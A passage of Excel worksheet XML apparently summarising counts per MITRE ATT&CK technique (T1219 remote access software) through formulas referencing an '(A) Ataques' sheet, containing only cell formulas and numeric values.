        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CL55,"")</f>
        <v>0</v>
      </c>
      <c r="AK55" s="322">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CN55,"")</f>
        <v>0</v>
      </c>
      <c r="AL55" s="4">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CP55,"")</f>
        <v>0</v>
      </c>
      <c r="AM55" s="20">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CQ55,"")</f>
        <v>0</v>
      </c>
      <c r="AN55" s="331">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($AJ55=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO55" s="322">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CR55,"")</f>
        <v>0</v>
      </c>
      <c r="AP55" s="322">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CT55,"")</f>
        <v>0</v>
      </c>
      <c r="AQ55" s="4">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CV55,"")</f>
        <v>0</v>
      </c>
      <c r="AR55" s="20">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CW55,"")</f>
        <v>0</v>
      </c>
      <c r="AS55" s="287">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($AO55=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT55" s="288">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!CX55,"")</f>
        <v>3</v>
      </c>
      <c r="AU55" s="392">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!CZ55,"")</f>
        <v>3</v>
      </c>
      <c r="AV55" s="4">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!DB55,"")</f>
        <v>3</v>
      </c>
      <c r="AW55" s="20">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!DC55,"")</f>
        <v>1</v>
      </c>
      <c r="AX55" s="331">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($AT55=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY55" s="469">
        <f>'(A) Ataques'!LU55+'(A) Ataques'!MA55+'(A) Ataques'!MG55+'(A) Ataques'!MM55+'(A) Ataques'!MS55</f>
        <v>0</v>
      </c>
      <c r="AZ55" s="510">
        <f>'(A) Ataques'!LW55+'(A) Ataques'!MC55+'(A) Ataques'!MI55+'(A) Ataques'!MO55+'(A) Ataques'!MU55</f>
        <v>0</v>
      </c>
      <c r="BA55" s="471">
        <f>'(A) Ataques'!LY55+'(A) Ataques'!ME55+'(A) Ataques'!MK55+'(A) Ataques'!MQ55+'(A) Ataques'!MW55</f>
        <v>0</v>
      </c>
      <c r="BB55" s="471">
        <f>'(A) Ataques'!LQ55</f>
        <v>0</v>
      </c>
      <c r="BC55" s="331">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($AY55=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD55" s="469">
        <f>IF('(A) Ataques'!$AP55&lt;&gt;"NO",'(A) Ataques'!LL55,"")</f>
        <v>2</v>
      </c>
      <c r="BE55" s="510">
        <f>IF('(A) Ataques'!$AP55&lt;&gt;"NO",'(A) Ataques'!LM55,"")</f>
        <v>2</v>
      </c>
      <c r="BF55" s="471">
        <f>IF('(A) Ataques'!$AP55&lt;&gt;"NO",'(A) Ataques'!LN55,"")</f>
        <v>0</v>
      </c>
      <c r="BG55" s="471">
        <f>IF('(A) Ataques'!$AP55&lt;&gt;"NO",'(A) Ataques'!LO55,"")</f>
        <v>2</v>
      </c>
      <c r="BH55" s="471">
        <f>IF('(A) Ataques'!$AP55&lt;&gt;"NO",'(A) Ataques'!LS55,"")</f>
        <v>2</v>
      </c>
      <c r="BI55" s="331">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($BD55=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ55" s="469">
        <f>'(A) Ataques'!OL55+'(A) Ataques'!OR55+'(A) Ataques'!OX55+'(A) Ataques'!PD55+'(A) Ataques'!PJ55</f>
        <v>1</v>
      </c>
      <c r="BK55" s="510">
        <f>'(A) Ataques'!ON55+'(A) Ataques'!OT55+'(A) Ataques'!OZ55+'(A) Ataques'!PF55+'(A) Ataques'!PL55</f>
        <v>1</v>
      </c>
      <c r="BL55" s="471">
        <f>'(A) Ataques'!OP55+'(A) Ataques'!OV55+'(A) Ataques'!PB55+'(A) Ataques'!PH55+'(A) Ataques'!PN55</f>
        <v>1</v>
      </c>
      <c r="BM55" s="495">
        <f>'(A) Ataques'!OH55</f>
        <v>1</v>
      </c>
      <c r="BN55" s="331">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($BJ55=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO55" s="469">
        <f>IF('(A) Ataques'!$AP55&lt;&gt;"NO",'(A) Ataques'!OC55,"")</f>
        <v>1</v>
      </c>
      <c r="BP55" s="510">
        <f>IF('(A) Ataques'!$AP55&lt;&gt;"NO",'(A) Ataques'!OD55,"")</f>
        <v>1</v>
      </c>
      <c r="BQ55" s="471">
        <f>IF('(A) Ataques'!$AP55&lt;&gt;"NO",'(A) Ataques'!OE55,"")</f>
        <v>1</v>
      </c>
      <c r="BR55" s="471">
        <f>IF('(A) Ataques'!$AP55&lt;&gt;"NO",'(A) Ataques'!OF55,"")</f>
        <v>1</v>
      </c>
      <c r="BS55" s="471">
        <f>IF('(A) Ataques'!$AP55&lt;&gt;"NO",'(A) Ataques'!OJ55,"")</f>
        <v>1</v>
      </c>
      <c r="BT55" s="331">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($BO55=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="56" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A56" s="79">
        <f t="shared" si="0"/>
        <v>54</v>
      </c>
      <c r="B56" s="4">
        <f>IF('(A) Ataques'!AK56&lt;&gt;"NO",'(A) Ataques'!E56,"")</f>
        <v>42</v>
      </c>
      <c r="C56" s="6" t="str">
        <f>IF('(A) Ataques'!AK56&lt;&gt;"NO",IF('(A) Ataques'!M56="","",'(A) Ataques'!M56),"")</f>
        <v>T1219-RemoteAccessSoftwareLocal</v>
      </c>
      <c r="D56" s="4" t="str">
        <f>IF('(A) Ataques'!AK56&lt;&gt;"NO",'(A) Ataques'!F56,"")</f>
        <v>T1219</v>
      </c>
      <c r="E56" s="286">
        <f>IF('(A) Ataques'!AK56&lt;&gt;"NO",'(A) Ataques'!AQ56,"")</f>
        <v>2</v>
      </c>
      <c r="F56" s="288">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!BB56,"")</f>
        <v>0</v>
      </c>
      <c r="G56" s="392">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!BD56,"")</f>
        <v>0</v>
      </c>
      <c r="H56" s="4">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!BF56,"")</f>
        <v>0</v>
      </c>
      <c r="I56" s="20">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!BG56,"")</f>
        <v>0</v>
      </c>
      <c r="J56" s="530">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($F56=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K56" s="322">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BH56,"")</f>
        <v>0</v>
      </c>
      <c r="L56" s="322">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BJ56,"")</f>
        <v>0</v>
      </c>
      <c r="M56" s="4">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BL56,"")</f>
        <v>0</v>
      </c>
      <c r="N56" s="20">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BM56,"")</f>
        <v>0</v>
      </c>
      <c r="O56" s="532">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($K56=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P56" s="292">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BN56,"")</f>
        <v>0</v>
      </c>
      <c r="Q56" s="322">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BP56,"")</f>
        <v>0</v>
      </c>
      <c r="R56" s="4">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BR56,"")</f>
        <v>0</v>
      </c>
      <c r="S56" s="20">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BS56,"")</f>
        <v>0</v>
      </c>
      <c r="T56" s="530">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($P56=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U56" s="322">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BT56,"")</f>
        <v>0</v>
      </c>
      <c r="V56" s="322">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BV56,"")</f>
        <v>0</v>
      </c>
      <c r="W56" s="4">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BX56,"")</f>
        <v>0</v>
      </c>
      <c r="X56" s="20">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$BY56,"")</f>
        <v>0</v>
      </c>
      <c r="Y56" s="532">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($U56=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="Z56" s="288">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!BZ56,"")</f>
        <v>4</v>
      </c>
      <c r="AA56" s="392">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!CB56,"")</f>
        <v>4</v>
      </c>
      <c r="AB56" s="4">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!CD56,"")</f>
        <v>2</v>
      </c>
      <c r="AC56" s="20">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!CE56,"")</f>
        <v>2</v>
      </c>
      <c r="AD56" s="331">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF(Z56=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE56" s="322">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CF56,"")</f>
        <v>4</v>
      </c>
      <c r="AF56" s="322">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CH56,"")</f>
        <v>4</v>
      </c>
      <c r="AG56" s="4">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CJ56,"")</f>
        <v>2</v>
      </c>
      <c r="AH56" s="20">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CK56,"")</f>
        <v>2</v>
      </c>
      <c r="AI56" s="287">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($AE56=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ56" s="292">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CL56,"")</f>
        <v>0</v>
      </c>
      <c r="AK56" s="322">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CN56,"")</f>
        <v>0</v>
      </c>
      <c r="AL56" s="4">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CP56,"")</f>
        <v>0</v>
      </c>
      <c r="AM56" s="20">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CQ56,"")</f>
        <v>0</v>
      </c>
      <c r="AN56" s="331">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($AJ56=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO56" s="322">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CR56,"")</f>
        <v>0</v>
      </c>
      <c r="AP56" s="322">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CT56,"")</f>
        <v>0</v>
      </c>
      <c r="AQ56" s="4">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CV56,"")</f>
        <v>0</v>
      </c>
      <c r="AR56" s="20">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!$CW56,"")</f>
        <v>0</v>
      </c>
      <c r="AS56" s="287">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($AO56=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT56" s="288">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!CX56,"")</f>
        <v>0</v>
      </c>
      <c r="AU56" s="392">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!CZ56,"")</f>
        <v>0</v>
      </c>
      <c r="AV56" s="4">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!DB56,"")</f>
        <v>0</v>
      </c>
      <c r="AW56" s="20">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",'(A) Ataques'!DC56,"")</f>
        <v>0</v>
      </c>
      <c r="AX56" s="331">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($AT56=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY56" s="469">
        <f>'(A) Ataques'!LU56+'(A) Ataques'!MA56+'(A) Ataques'!MG56+'(A) Ataques'!MM56+'(A) Ataques'!MS56</f>
        <v>0</v>
      </c>
      <c r="AZ56" s="510">
        <f>'(A) Ataques'!LW56+'(A) Ataques'!MC56+'(A) Ataques'!MI56+'(A) Ataques'!MO56+'(A) Ataques'!MU56</f>
        <v>0</v>
      </c>
      <c r="BA56" s="471">
        <f>'(A) Ataques'!LY56+'(A) Ataques'!ME56+'(A) Ataques'!MK56+'(A) Ataques'!MQ56+'(A) Ataques'!MW56</f>
        <v>0</v>
      </c>
      <c r="BB56" s="471">
        <f>'(A) Ataques'!LQ56</f>
        <v>0</v>
      </c>
      <c r="BC56" s="331">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($AY56=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD56" s="469">
        <f>IF('(A) Ataques'!$AP56&lt;&gt;"NO",'(A) Ataques'!LL56,"")</f>
        <v>1</v>
      </c>
      <c r="BE56" s="510">
        <f>IF('(A) Ataques'!$AP56&lt;&gt;"NO",'(A) Ataques'!LM56,"")</f>
        <v>1</v>
      </c>
      <c r="BF56" s="471">
        <f>IF('(A) Ataques'!$AP56&lt;&gt;"NO",'(A) Ataques'!LN56,"")</f>
        <v>0</v>
      </c>
      <c r="BG56" s="471">
        <f>IF('(A) Ataques'!$AP56&lt;&gt;"NO",'(A) Ataques'!LO56,"")</f>
        <v>1</v>
      </c>
      <c r="BH56" s="471">
        <f>IF('(A) Ataques'!$AP56&lt;&gt;"NO",'(A) Ataques'!LS56,"")</f>
        <v>1</v>
      </c>
      <c r="BI56" s="331">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($BD56=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ56" s="469">
        <f>'(A) Ataques'!OL56+'(A) Ataques'!OR56+'(A) Ataques'!OX56+'(A) Ataques'!PD56+'(A) Ataques'!PJ56</f>
        <v>0</v>
      </c>
      <c r="BK56" s="510">
        <f>'(A) Ataques'!ON56+'(A) Ataques'!OT56+'(A) Ataques'!OZ56+'(A) Ataques'!PF56+'(A) Ataques'!PL56</f>
        <v>0</v>
      </c>
      <c r="BL56" s="471">
        <f>'(A) Ataques'!OP56+'(A) Ataques'!OV56+'(A) Ataques'!PB56+'(A) Ataques'!PH56+'(A) Ataques'!PN56</f>
        <v>0</v>
      </c>
      <c r="BM56" s="495">
        <f>'(A) Ataques'!OH56</f>
        <v>0</v>
      </c>
      <c r="BN56" s="331">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($BJ56=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO56" s="469">
        <f>IF('(A) Ataques'!$AP56&lt;&gt;"NO",'(A) Ataques'!OC56,"")</f>
        <v>0</v>
      </c>
      <c r="BP56" s="510">
        <f>IF('(A) Ataques'!$AP56&lt;&gt;"NO",'(A) Ataques'!OD56,"")</f>
        <v>0</v>
      </c>
      <c r="BQ56" s="471">
        <f>IF('(A) Ataques'!$AP56&lt;&gt;"NO",'(A) Ataques'!OE56,"")</f>
        <v>0</v>
      </c>
      <c r="BR56" s="471">
        <f>IF('(A) Ataques'!$AP56&lt;&gt;"NO",'(A) Ataques'!OF56,"")</f>
        <v>0</v>
      </c>
      <c r="BS56" s="471">
        <f>IF('(A) Ataques'!$AP56&lt;&gt;"NO",'(A) Ataques'!OJ56,"")</f>
        <v>0</v>
      </c>
      <c r="BT56" s="331">
        <f>IF('(A) Ataques'!$AK56&lt;&gt;"NO",IF($BO56=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A57" s="79">
        <f t="shared" si="0"/>
        <v>55</v>
      </c>
      <c r="B57" s="4">
        <f>IF('(A) Ataques'!AK57&lt;&gt;"NO",'(A) Ataques'!E57,"")</f>
        <v>42</v>
      </c>
      <c r="C57" s="6" t="str">
        <f>IF('(A) Ataques'!AK57&lt;&gt;"NO",IF('(A) Ataques'!M57="","",'(A) Ataques'!M57),"")</f>
        <v>T1219-RemoteAccessSoftwareNAT</v>
      </c>
      <c r="D57" s="4" t="str">
        <f>IF('(A) Ataques'!AK57&lt;&gt;"NO",'(A) Ataques'!F57,"")</f>
        <v>T1219</v>
      </c>
      <c r="E57" s="286">
        <f>IF('(A) Ataques'!AK57&lt;&gt;"NO",'(A) Ataques'!AQ57,"")</f>
        <v>145</v>
      </c>
      <c r="F57" s="288">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!BB57,"")</f>
        <v>114</v>
      </c>
      <c r="G57" s="392">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!BD57,"")</f>
        <v>83</v>
      </c>
      <c r="H57" s="4">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!BF57,"")</f>
        <v>5</v>
      </c>
      <c r="I57" s="20">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!BG57,"")</f>
        <v>27</v>
      </c>
      <c r="J57" s="530">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($F57=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K57" s="322">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BH57,"")</f>
        <v>0</v>
      </c>
      <c r="L57" s="322">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BJ57,"")</f>
        <v>0</v>
      </c>
      <c r="M57" s="4">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BL57,"")</f>
        <v>0</v>
      </c>
      <c r="N57" s="20">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BM57,"")</f>
        <v>0</v>
      </c>
      <c r="O57" s="532">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($K57=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P57" s="292">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BN57,"")</f>
        <v>114</v>
      </c>
      <c r="Q57" s="322">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BP57,"")</f>
        <v>83</v>
      </c>
      <c r="R57" s="4">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BR57,"")</f>
        <v>5</v>
      </c>
      <c r="S57" s="20">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BS57,"")</f>
        <v>27</v>
      </c>
      <c r="T57" s="530">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($P57=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U57" s="322">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BT57,"")</f>
        <v>159</v>
      </c>
      <c r="V57" s="322">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BV57,"")</f>
        <v>114</v>
      </c>
      <c r="W57" s="4">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BX57,"")</f>
        <v>10</v>
      </c>
      <c r="X57" s="20">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$BY57,"")</f>
        <v>50</v>
      </c>
      <c r="Y57" s="532">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($U57=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z57" s="288">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!BZ57,"")</f>
        <v>32</v>
      </c>
      <c r="AA57" s="392">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!CB57,"")</f>
        <v>32</v>
      </c>
      <c r="AB57" s="4">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!CD57,"")</f>
        <v>5</v>
      </c>
      <c r="AC57" s="20">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!CE57,"")</f>
        <v>30</v>
      </c>
      <c r="AD57" s="331">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF(Z57=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE57" s="322">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CF57,"")</f>
        <v>191</v>
      </c>
      <c r="AF57" s="322">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CH57,"")</f>
        <v>146</v>
      </c>
      <c r="AG57" s="4">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CJ57,"")</f>
        <v>15</v>
      </c>
      <c r="AH57" s="20">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CK57,"")</f>
        <v>62</v>
      </c>
      <c r="AI57" s="287">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($AE57=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ57" s="292">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CL57,"")</f>
        <v>0</v>
      </c>
      <c r="AK57" s="322">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CN57,"")</f>
        <v>0</v>
      </c>
      <c r="AL57" s="4">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CP57,"")</f>
        <v>0</v>
      </c>
      <c r="AM57" s="20">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CQ57,"")</f>
        <v>0</v>
      </c>
      <c r="AN57" s="331">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($AJ57=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO57" s="322">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CR57,"")</f>
        <v>1</v>
      </c>
      <c r="AP57" s="322">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CT57,"")</f>
        <v>1</v>
      </c>
      <c r="AQ57" s="4">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CV57,"")</f>
        <v>1</v>
      </c>
      <c r="AR57" s="20">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!$CW57,"")</f>
        <v>1</v>
      </c>
      <c r="AS57" s="287">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($AO57=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT57" s="288">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!CX57,"")</f>
        <v>115</v>
      </c>
      <c r="AU57" s="392">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!CZ57,"")</f>
        <v>84</v>
      </c>
      <c r="AV57" s="4">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!DB57,"")</f>
        <v>6</v>
      </c>
      <c r="AW57" s="20">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",'(A) Ataques'!DC57,"")</f>
        <v>28</v>
      </c>
      <c r="AX57" s="331">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($AT57=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY57" s="469">
        <f>'(A) Ataques'!LU57+'(A) Ataques'!MA57+'(A) Ataques'!MG57+'(A) Ataques'!MM57+'(A) Ataques'!MS57</f>
        <v>34</v>
      </c>
      <c r="AZ57" s="510">
        <f>'(A) Ataques'!LW57+'(A) Ataques'!MC57+'(A) Ataques'!MI57+'(A) Ataques'!MO57+'(A) Ataques'!MU57</f>
        <v>33</v>
      </c>
      <c r="BA57" s="471">
        <f>'(A) Ataques'!LY57+'(A) Ataques'!ME57+'(A) Ataques'!MK57+'(A) Ataques'!MQ57+'(A) Ataques'!MW57</f>
        <v>2</v>
      </c>
      <c r="BB57" s="471">
        <f>'(A) Ataques'!LQ57</f>
        <v>32</v>
      </c>
      <c r="BC57" s="331">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($AY57=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD57" s="469">
        <f>IF('(A) Ataques'!$AP57&lt;&gt;"NO",'(A) Ataques'!LL57,"")</f>
        <v>175</v>
      </c>
      <c r="BE57" s="510">
        <f>IF('(A) Ataques'!$AP57&lt;&gt;"NO",'(A) Ataques'!LM57,"")</f>
        <v>174</v>
      </c>
      <c r="BF57" s="471">
        <f>IF('(A) Ataques'!$AP57&lt;&gt;"NO",'(A) Ataques'!LN57,"")</f>
        <v>2</v>
      </c>
      <c r="BG57" s="471">
        <f>IF('(A) Ataques'!$AP57&lt;&gt;"NO",'(A) Ataques'!LO57,"")</f>
        <v>6</v>
      </c>
      <c r="BH57" s="471">
        <f>IF('(A) Ataques'!$AP57&lt;&gt;"NO",'(A) Ataques'!LS57,"")</f>
        <v>145</v>
      </c>
      <c r="BI57" s="331">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($BD57=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ57" s="469">
        <f>'(A) Ataques'!OL57+'(A) Ataques'!OR57+'(A) Ataques'!OX57+'(A) Ataques'!PD57+'(A) Ataques'!PJ57</f>
        <v>30</v>
      </c>
      <c r="BK57" s="510">
        <f>'(A) Ataques'!ON57+'(A) Ataques'!OT57+'(A) Ataques'!OZ57+'(A) Ataques'!PF57+'(A) Ataques'!PL57</f>
        <v>28</v>
      </c>
      <c r="BL57" s="471">
        <f>'(A) Ataques'!OP57+'(A) Ataques'!OV57+'(A) Ataques'!PB57+'(A) Ataques'!PH57+'(A) Ataques'!PN57</f>
        <v>6</v>
      </c>
      <c r="BM57" s="495">
        <f>'(A) Ataques'!OH57</f>
        <v>21</v>
      </c>
      <c r="BN57" s="331">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($BJ57=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO57" s="469">
        <f>IF('(A) Ataques'!$AP57&lt;&gt;"NO",'(A) Ataques'!OC57,"")</f>
        <v>30</v>
      </c>
      <c r="BP57" s="510">
        <f>IF('(A) Ataques'!$AP57&lt;&gt;"NO",'(A) Ataques'!OD57,"")</f>
        <v>28</v>
      </c>
      <c r="BQ57" s="471">
        <f>IF('(A) Ataques'!$AP57&lt;&gt;"NO",'(A) Ataques'!OE57,"")</f>
        <v>6</v>
      </c>
      <c r="BR57" s="471">
        <f>IF('(A) Ataques'!$AP57&lt;&gt;"NO",'(A) Ataques'!OF57,"")</f>
        <v>2</v>
      </c>
      <c r="BS57" s="471">
        <f>IF('(A) Ataques'!$AP57&lt;&gt;"NO",'(A) Ataques'!OJ57,"")</f>
        <v>21</v>
      </c>
      <c r="BT57" s="331">
        <f>IF('(A) Ataques'!$AK57&lt;&gt;"NO",IF($BO57=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="58" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A58" s="79">
        <f t="shared" si="0"/>
        <v>56</v>
      </c>
      <c r="B58" s="4">
